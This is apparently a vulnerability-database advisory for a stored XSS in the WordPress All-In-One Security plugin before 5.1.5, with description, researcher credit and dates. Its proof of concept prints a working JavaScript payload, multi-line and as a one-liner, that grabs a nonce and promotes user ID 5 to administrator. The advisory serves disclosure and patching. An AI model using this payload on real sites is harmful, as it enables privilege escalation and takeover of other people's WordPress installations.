WordPress Plugin Vulnerabilities
All-In-One Security (AIOS) < 5.1.5 - Admin+ Stored XSS
Description
The plugin does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.
Proof of Concept
Just create a test.pdf file with JavaScript content (necessarily in one line) and display the file in the Host system logs. An example of a JavaScript payload increasing the privileges of a user with ID 5 <script> fetch("https://<host>/wp-admin/users.php?update=promote") .then(function(response) { return response.text() }) .then(function(html) { var parser = new DOMParser(); var doc = parser.parseFromString(html, "text/html"); return doc.querySelector("#_wpnonce").value; }) .then(function(nonce) { fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator") .then(function(response) { console.log(response.text()); }) .catch(function(err) { console.log('Failed to fetch page: ', err); }); }) .catch(function(err) { console.log('Failed to fetch page: ', err); }); </script> Oneliner: fetch("https://<host>/wp-admin/users.php?update=promote").then(function(response) {return response.text()}).then(function(html) {var parser = new DOMParser();var doc = parser.parseFromString(html, "text/html");return doc.querySelector("#_wpnonce").value;}).then(function(nonce) {fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator").then(function(response) {console.log(response.text());}).catch(function(err) {console.log('Failed to fetch page: ', err); });}).catch(function(err) {console.log('Failed to fetch page: ', err);}); Replace values with <> signs.
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Bartłomiej Marek
Submitter
Bartłomiej Marek
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-20 (about 1 years ago)
Added
2023-03-20 (about 1 years ago)
Last Updated
2023-03-20 (about 1 years ago)